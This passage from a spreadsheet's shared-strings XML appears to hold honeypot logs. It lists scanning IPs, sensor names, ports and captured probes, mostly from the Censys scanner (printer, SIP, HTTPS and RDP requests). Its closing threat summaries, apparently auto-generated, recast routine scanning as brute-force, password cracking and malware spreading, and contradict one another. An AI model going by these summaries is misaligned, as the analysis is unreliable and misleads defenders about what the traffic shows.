_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H11</t>
  </si>
  <si>
    <t>5900&amp;&amp;55071&amp;&amp;56309&amp;&amp;61820&amp;&amp;52126&amp;&amp;50694&amp;&amp;62642&amp;&amp;58656&amp;&amp;60959</t>
  </si>
  <si>
    <t>::ffff:ac51:3ee6</t>
  </si>
  <si>
    <t>f5b007750e1a269d598cb774f8d74f56</t>
  </si>
  <si>
    <t>162.216.241.32</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.162-216-241-32.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H38</t>
  </si>
  <si>
    <t>57380&amp;&amp;5900&amp;&amp;64255&amp;&amp;55289&amp;&amp;63859&amp;&amp;55183&amp;&amp;56673&amp;&amp;62051</t>
  </si>
  <si>
    <t>::ffff:a2d8:f120</t>
  </si>
  <si>
    <t>68e23ebef8dab08f3e4a94053ebe8198</t>
  </si>
  <si>
    <t>172.81.62.180</t>
  </si>
  <si>
    <t>unassigned.172-81-62-180.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;33898&amp;&amp;63301&amp;&amp;54313&amp;&amp;65489&amp;&amp;55658&amp;&amp;56785&amp;&amp;55090&amp;&amp;59388&amp;&amp;49378&amp;&amp;58622&amp;&amp;61226</t>
  </si>
  <si>
    <t>::ffff:ac51:3eb4</t>
  </si>
  <si>
    <t>9ca0a7aa5a42ee39745c7d1e006bc03e</t>
  </si>
  <si>
    <t>167.94.138.183</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Endpoint Enumeration</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_IPP_H17&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_HTTP_H31&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_MYSQL_H4&amp;&amp;SMA-LAB_IPP_H15&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_IRC_H36&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_IRC_H39&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_IPP_H28&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_SMTP_H34&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_SIP_H20&amp;&amp;SMA-LAB_IPP_H18&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_IRC_H38&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_LDAP_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;41062&amp;&amp;25&amp;&amp;1521&amp;&amp;3306&amp;&amp;143&amp;&amp;1080&amp;&amp;110&amp;&amp;5900&amp;&amp;445&amp;&amp;1433&amp;&amp;631&amp;&amp;NA&amp;&amp;23&amp;&amp;443&amp;&amp;389&amp;&amp;54213&amp;&amp;5432&amp;&amp;6379&amp;&amp;6667&amp;&amp;3389&amp;&amp;53482&amp;&amp;21&amp;&amp;38724&amp;&amp;38726&amp;&amp;9100&amp;&amp;36976&amp;&amp;36166&amp;&amp;60614&amp;&amp;41346&amp;&amp;41366</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;request&amp;&amp;command&amp;&amp;NA&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=35473'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.182.38.84:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.54.116.162:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.116.162:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.171.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,50782)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTPS:{'Host': '38.54.116.162:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.40.123:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '94.131.8.76:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.8.76:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,37810)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_HTTPS:{'Host': '154.26.156.60:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=54092'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=44259'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=56119'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 149.102.153.168:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '|8e x08 /00IDED_x000D_'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,54214)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=58333'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=48194'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,59316)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.224.106:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=47748'}}&amp;&amp;{Data_HTTPS:{'Host': '94.131.8.76:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'x01
'}}&amp;&amp;{Data_PJL:{'command': 'x02lp
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=52347'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.113.68.70:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.180.55.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.180.55.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.183;rport=36583'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.183,50810)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.136.113:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}</t>
  </si>
  <si>
    <t>::ffff:a75e:8ab7</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and exploit various services on the network, including FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and others. They are using common attacks such as brute-force login attempts, password cracking, scanning for open ports, and exploiting vulnerabilities to gain unauthorized access. &amp;&amp; An attacker is attempting to authenticate using TLS encryption with the FTP service. This could be an initial step for a potential exploitation or data exfiltration attempt. The use of TLS may indicate the attacker's intention to establish a secure connection for malicious activities. &amp;&amp; The data suggests an attempt to use FTP encryption, possibly indicating a malicious actor trying to establish secure communication for unauthorized access. This could be part of a brute-force login attempt or a reconnaissance phase. It may also indicate the actor is using a proxy or anonymization service. &amp;&amp; This indicates an attempt to access PostgreSQL database services, which may be a sign of unauthorized database scanning or exploitation. The actor is likely probing the system for vulnerabilities or attempting to gain unauthorized access. This could potentially lead to further malicious activities such as data theft or compromise. &amp;&amp; This log suggests that there was an attempt to access FTP services but did not provide any data, indicating potentially malicious probing or scanning activity. The lack of provided data could indicate the attacker is gathering information for a future attack. This behavior may be indicative of reconnaissance efforts. &amp;&amp; No FTP connection was made. This indicates that an attacker did not attempt to establish a malicious FTP session. Activity was likely suppressed or prevented. &amp;&amp; A POST request was made to a printer service, indicating potential unauthorized access or scanning activity. The User-Agent indicates it is likely a scanner or crawler from CensysInspect. This could be related to reconnaissance or exploitation of network services. &amp;&amp; Someone is attempting to send a POST request with a large payload to a printer or print server at IP address 193.57.136.113, potentially trying to exploit vulnerabilities in the device's IPP service. This could be an attack aimed at spreading malware through the network by exploiting unpatched devices. The user agent indicates this may be a scanning activity by a security tool.</t>
  </si>
  <si>
